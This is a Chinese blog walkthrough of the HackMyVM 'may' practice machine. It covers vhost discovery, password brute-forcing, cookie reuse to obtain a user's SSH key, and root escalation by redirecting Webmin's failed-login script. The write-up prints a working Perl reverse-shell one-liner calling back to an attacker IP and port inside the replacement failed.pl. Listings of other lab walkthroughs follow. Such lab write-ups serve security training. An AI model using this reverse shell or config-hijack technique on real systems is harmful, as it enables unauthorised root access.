hackmyvm: may walkthrough

最新推荐文章于 2026-03-31 19:54:33 发布
原创 最新推荐文章于 2026-03-31 19:54:33 发布 · 583 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文讲述了通过信息收集,发现VHost并爆破密码,利用Webmin漏洞获取用户marie的私钥,进一步通过反弹shell获取root权限的过程。涉及到的技术包括域名解析、SSH私钥、Webmin配置篡改和sudo权限滥用。

hackmyvm: may walkthrough

信息收集

port
访问80,会跳转到域名may.hmv访问,这里需添加hosts访问。
user
得到了一个用户明marie
爆破目录未果,于是爆破vhost。
vhost
找到两个vhost,portalssh。添加hosts后访问portal.may.hmv。这个一个登录页面,会验证用户名和密码,尝试注入失败后,利用前面得到的用户名尝试爆破密码。
pass
得到密码rebelde并成功获取到了cookie,将这个cookie注入到http://ssh.may.hmv/check.php的请求中去,成功获取marie用户的私钥。
id_rsa

获取user flag

将私钥保存,并设置为只可当前用户读写,ssh登录marie
mariessh
userflag

获取root flag

查看root用户进程,发现了如下进程。
webmin
查看miniserv.conf文件权限,发现marie可以直接编辑,于是在home目录下创建一个failed.pl替换掉默认的。

miniserv
modifyminiserv
failed.pl中加入了反弹shell代码。

marie@may:~$ cat failed.pl 
#!/usr/bin/perl
use Socket;$i="192.168.143.135";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
open(CONF, "</etc/webmin/miniserv.conf") || die "Failed to open /etc/webmin/miniserv.conf : $!";
while(<CONF>) {
        $root = $1 if (/^root=(.*)/);
        }
close(CONF);
$root || die "No root= line found in /etc/webmin/miniserv.conf";
$ENV{'PERLLIB'} = "$root";
$ENV{'WEBMIN_CONFIG'} = "/etc/webmin";
$ENV{'WEBMIN_VAR'} = "/var/webmin";
delete($ENV{'MINISERV_CONFIG'});
chdir("$root");
exec("$root/record-failed.pl", @ARGV) || die "Failed to run $root/record-failed.pl : $!";

利用sudo重启虚拟机(marie可以无密码执行sudo reboot)。重启后随便webmin登录一个错误账号就可以反弹root。
rootflag

hackmyvm——pwned之docker逃逸
m0_63641882的博客
03-19 1128
1.gobuster的使用扫描挺快2.ssh私钥登录3.docker逃逸进行提权后言:刚入门网安的一只小白,想把自学的学习的过程记录下来方便自己,帮助他人。可以私信博主欢迎学习交流!!!
打靶手记之hackmyvm--UnbakedPie
milu_Sec的博客
02-06 1169
关于反序列化,可能有小白还不理解,这里如果直接解释会有点过臃长了,简单来说序列化的目的是为了保存、传递和恢复对象,不同的语言有自己不同的序列化方式,这里建议小白从php的序列化开始学习,如果实在想不通,可以理解成,为了方便,把对象通过某种算法变成了一串编码,如果有师傅需要,麋鹿后期也可以针对序列化出系列专栏。相比于 PHP 反序列化必须要依赖于当前代码中类的存在以及方法的存在,python的序列化其实就是把它转换成相应的操作码,当我们进行反序列化的时候,是把那一串操作码变回来,
hackmyvm入门(靶机网络配置)
Bu2n的博客
04-13 7697
hackmyvm概述hackmyvm靶机下载地址靶机网络配置测试环境环境搭建愉快玩耍 hackmyvm概述 hackmyvm是一个平台,包含了大量靶机,类似于vulnhub、hackthebox等平台,你可以在上面下载靶机,进行渗透测试练习,非常适合热爱黑客技术或从事渗透测试的人员。我个人觉得,hackmyvm相比vulnhub好的地方在于它的靶机所占磁盘空间小,hackmyvm靶机一般在1G左右,而vulnhub靶机动不动就2G,甚至我见过还有6G的。不扯这些了,今天是聊一聊hackmyvm到底怎么玩.
HackMyVM: Flute 靶机渗透题解
最新发布
vortex5的博客
03-31 681
本文记录了针对目标主机(192.168.56.159)的渗透测试过程。首先通过端口扫描发现8888端口运行的GraphQL服务(Apollo Server),利用未禁用的内省功能成功获取User对象中的敏感信息,提取到SSH凭证(hamelin/comewithmerats)。登录SSH后发现系统为Alpine Linux环境,并进行了初步的进程枚举。整个过程展示了GraphQL内省漏洞的利用方法及权限提升路径。
渗透靶场——HackMyVM:BlackWidow
tlovejr的博客
04-06 3379
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机ip地址:192.168.1.118 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.118 在这里发现了很多开放的端口,那么我们还是老规矩,先在80端口进
HackmyVM-----Boxing靶机
woshicainiao666的博客
04-18 805
发现很多的403状态码,这代表没有权限访问,通过ssrf试一下,ssrf就是服务器为跳板访问内网未授权的内容。去看网页的所有功能点,看有没有常规的漏洞,不止要用鼠标点点点,也要转包,看响应包回响。这里看了别的博主写的payload,直接可以执行命令。,像域名,先将域添加到/etc/hosts中。太难搞了,受不了,兄弟们,不打了不打了。看到响应包中响应头出现。
渗透靶场——HackMyVM:Pingme
tlovejr的博客
04-13 3641
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:桥接自动获取ip 靶机ip地址:(桥接自动获取ip) 提示信息: CTF 目标: user.txt和root.txt 信息收集 扫描主机 arp-scan -l 发现存活主机192.168.1.10 扫描端口 扫描靶机开放的服务端口 nmap -A -T4 -p- 192.168.1.10 发现还是只有22端口和80端口开放 Web渗透 访问web端口 http:
渗透靶场——HackMyVM:Tom
tlovejr的博客
03-28 2205
部署环境 提供镜像文件后,直接用虚拟机打开即可,kali攻击机用VMware打开即可,靶机用vbox打开即可 kali攻击机ip地址:192.168.1.11(桥接) 靶机ip地址:(桥接自动获取ip) 信息收集 扫描主机 arp-scan -l 发现了存活主机的ip地址为192.168.1.69 扫描端口 扫描靶机开放的服务端口 nmap -p- -A 192.168.1.69 发现有22,80,8080端口进行开放,正常情况下我们现在先在80端口开始突破 Web渗透 http://192.
hackmyvm-hostname靶机
weixin_52710247的博客
11-16 606
hostname靶机复现
hackmyvm-hopper walkthrough
xdeclearn的博客
08-05 490
hackmyvm: hopper 信息收集到获取第一个shell PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 全端口扫描,先访问一下web服务。 利用gobuster扫描目录找到目录advanced-search,这里存在ssrf。 虚拟机有三个用户可以bash登录,root,edward,henry。 经过简单测试,不能进行远程文件包含,估计是调用的curl_exec,关于php的ssrf利用一般情况下可以参看SSRF in PH
Hackmyvm综合靶机 | Driftingblues-1
IerkeU的博客
04-01 3415
前提概要 靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / nmap下的工具) 二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程… 信息收集 arp-scan 192.168.132.0/24 之前都是扫出目标后就之间nmap一把梭 后面了解到这样容易暴露目标 所以
alzheimer ---hackmyvm
m0_64253567的博客
07-23 393
hackmyvm ----alzheimer
杂项入门-图片篇(信息附加)
akdelt的博客
11-16 564
StegSolve 打开图片,选中 Analyse 的 File Format 模块。或者 010 最下面得到 flag。
hackmyvm】moosage靶机wp
qq_55349490的博客
12-23 1110
我们找一下这个cowsay有很多种动物可以选择。但是我每次登录都是牛牛在说话。那么我们只需要找到牛牛的配置文件即可。登录进来后,我们可以进行留言,但没有上传文件 只能上传图片。直接用页面源代码去github上搜索看能不能找到源码。从这个牛牛说话就能联想到ssh登录时使用了。用户的账号密码发现可以直接切换账户。可以获取到mysql的账号密码。使用默认管理员账号密码登录后台。发现里面没有什么可以利用的。然后ssh登录 实现提权。文件的本质是Perl脚本。里面可以获取到默认密码。尝试上传一个图片马试试。
HackMyVM-Pingme靶机的测试报告
ccc_9wy的博客
01-16 902
基于渗透测试流程渗透Pingme靶机;HackMyVM靶场;正则匹配;ssh登录;icmp数据包;X-Forwarded-For;ping命令。
Run - hackmyvm
tanbinn的博客
04-09 807
hackmyvm的Run靶场
hackmyvm】vivifytech靶机
woshicainiao666的博客
04-29 679
http://192.168.9.164/wordpress/wp-includes/secrets.txt,文本文件,应该是用户名的密码,但是user在哪,不知道。MySQL X是一种用于MySQL数据库的新协议,它支持文档存储和异步操作,通常用于实现更高级的数据库功能。在 http://192.168.9.164/wordpress/wp-includes/中发现目录遍历。看了老外的文章,找到了user用户。在所有的.php文件中要么时空白页面被解析,要么不能访问,终于找到一个。80端口如图,扫目录。
HackMyVM —find
Innocence_0的博客
07-24 411
发现并不存在boom目录,创建boom目录和boom.sh文件。发现并不存在boom目录,创建boom目录和boom.sh文件。提取到root,查看/root/root.txt。提取到root,查看/root/root.txt。攻击手法:Malbolge语言、sudo提权。发现存在cat.jpg和robots.txt。目标: user.txt root.txt。下载并进行对比,发现一段代码。下载并查看 cat.jpg。找到第一个user.txt。查看robots.txt。
HackMyvm靶机系列(5)-warez
qq_70727026的博客
05-14 451
一、信息收集 先扫描一波网段,找到靶机。 nmap -sP 192.168.220.0/24 使用nmap进行端口扫描,发现开放了22,80,6800三个端口。 nmap -sC -sV -T4 -p- -sT -A 192.168.220.128 访问一波http服务,页面如下。不知道是啥,但是发现有关键字Aria2 WebUI,上百度搜索一波,发现这是一个下载资源的东西。 查看一下源代码,发现下面的关键字,搜索一波,看看有啥漏洞可以利用不。 额.....,离谱,真就一个
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值